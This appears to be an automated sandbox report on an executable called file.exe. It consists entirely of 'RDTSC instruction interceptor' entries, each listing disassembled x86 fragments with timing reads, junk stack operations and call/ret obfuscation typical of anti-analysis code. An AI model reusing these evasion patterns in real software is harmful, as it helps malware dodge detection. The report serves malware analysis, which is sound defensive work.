                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D181 second address: 103D1AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B9246Ch 0x00000008 je 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push ebx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ebx 0x00000019 jnl 00007F8114B9246Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1AD second address: 103D1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F8114E11BEFh 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 stc 0x00000013 mov esi, dword ptr [ebp+122D3AA6h] 0x00000019 popad 0x0000001a pop edx 0x0000001b push DE2256ABh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jbe 00007F8114E11BE6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1E1 second address: 103D1EB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D1EB second address: 103D1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D5CA second address: 103D602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 adc ecx, 6C3C07ABh 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F8114B92468h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b nop 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D949 second address: 103D94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D94D second address: 103D957 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D957 second address: 103D9D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F8114E11BF4h 0x00000011 push edi 0x00000012 jmp 00007F8114E11BECh 0x00000017 pop edi 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8114E11BE8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 0000001Eh 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F8114E11BE8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov edx, 50A67A94h 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F8114E11BF5h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D9D9 second address: 103D9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DB71 second address: 103DB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DDA7 second address: 103DDED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B92468h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F8114B9246Eh 0x00000014 lea eax, dword ptr [ebp+1247E90Ch] 0x0000001a mov ecx, 6DEA69C1h 0x0000001f movsx edi, dx 0x00000022 push eax 0x00000023 pushad 0x00000024 jns 00007F8114B92468h 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007F8114B9246Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DDED second address: 103DE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edx, ax 0x0000000c lea eax, dword ptr [ebp+1247E8C8h] 0x00000012 jmp 00007F8114E11BF7h 0x00000017 nop 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DE1C second address: 103DE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DE20 second address: 10271D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jng 00007F8114E11BE6h 0x00000014 jmp 00007F8114E11BECh 0x00000019 popad 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8114E11BE8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov ecx, esi 0x00000038 cmc 0x00000039 call dword ptr [ebp+124508AAh] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8114E11BF0h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B17B second address: 107B195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B92476h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B195 second address: 107B1A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B1A1 second address: 107B1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B496 second address: 107B49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B49C second address: 107B4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5F0 second address: 107B5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5F6 second address: 107B5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5FA second address: 107B5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B5FE second address: 107B607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8A0 second address: 107B8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007F8114E11BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8B0 second address: 107B8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jc 00007F8114B92466h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B8C2 second address: 107B8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BA2D second address: 107BA5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8114B92472h 0x0000000c push edx 0x0000000d jne 00007F8114B92466h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 jo 00007F8114B92488h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BA5A second address: 107BA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BBBD second address: 107BBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E21 second address: 1084E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114E11BE6h 0x0000000a ja 00007F8114E11BE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E36 second address: 1084E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084E3A second address: 1084E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8114E11BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F8114E11BF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B19 second address: 1083B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Fh 0x00000007 jp 00007F8114B9246Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C63 second address: 1083C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C67 second address: 1083C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F8114B92466h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C76 second address: 1083C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840DC second address: 10840E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084236 second address: 108423C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108423C second address: 1084248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084248 second address: 108425D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10847B8 second address: 10847BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CB4 second address: 1086CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114E11BE6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F8114E11BE6h 0x00000013 jmp 00007F8114E11BF8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CDF second address: 1086CE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086CE9 second address: 1086CEE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086E53 second address: 1086E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8114B92476h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089C16 second address: 1089C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089D58 second address: 1089D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089E96 second address: 1089E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A018 second address: 108A01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A01C second address: 108A028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A028 second address: 108A02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E435 second address: 108E43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E43E second address: 108E49A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8114B92495h 0x00000008 jmp 00007F8114B92477h 0x0000000d jmp 00007F8114B92478h 0x00000012 jg 00007F8114B9246Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jc 00007F8114B92466h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F8114B9246Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E49A second address: 108E4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BF7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094759 second address: 1094764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094764 second address: 109476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932DD second address: 10932E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10932E1 second address: 10932E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109346D second address: 1093476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935BB second address: 10935CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8114E11BEDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935CF second address: 10935DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10935DC second address: 1093615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jne 00007F8114E11BECh 0x0000000d jo 00007F8114E11BE6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pushad 0x0000001b jmp 00007F8114E11BF2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093615 second address: 109362B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B9246Ch 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937B7 second address: 10937BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937BB second address: 10937BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10937BF second address: 10937E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F8114E11BF1h 0x0000000e push eax 0x0000000f pop eax 0x00000010 je 00007F8114E11BE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D75C second address: 103D761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D761 second address: 103D772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114E11BEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D772 second address: 103D776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D83F second address: 103D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D84B second address: 103D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093AB1 second address: 1093AC1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8114E11BF2h 0x00000008 jnl 00007F8114E11BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10977E3 second address: 10977F3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097D27 second address: 1097D33 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BEEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EA5 second address: 1097EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097EA9 second address: 1097EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0842 second address: 10A086D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8114B92479h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A086D second address: 10A0871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FA0B second address: 109FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFA1 second address: 109FFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFA6 second address: 109FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FFAC second address: 109FFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A027E second address: 10A02A3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 jmp 00007F8114B92475h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02A3 second address: 10A02A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A522B second address: 10A5233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8279 second address: 10A82A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F8114E11BFFh 0x0000000d jl 00007F8114E11BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A83DA second address: 10A83FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114B92471h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jng 00007F8114B92466h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A83FD second address: 10A843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BEAh 0x0000000a jmp 00007F8114E11BF6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007F8114E11BF7h 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A843E second address: 10A8443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8579 second address: 10A857D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A857D second address: 10A85A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92477h 0x00000007 jbe 00007F8114B92466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89AA second address: 10A89EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BEDh 0x00000007 jmp 00007F8114E11BF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jo 00007F8114E11BE6h 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F8114E11BE6h 0x00000023 rdtsc
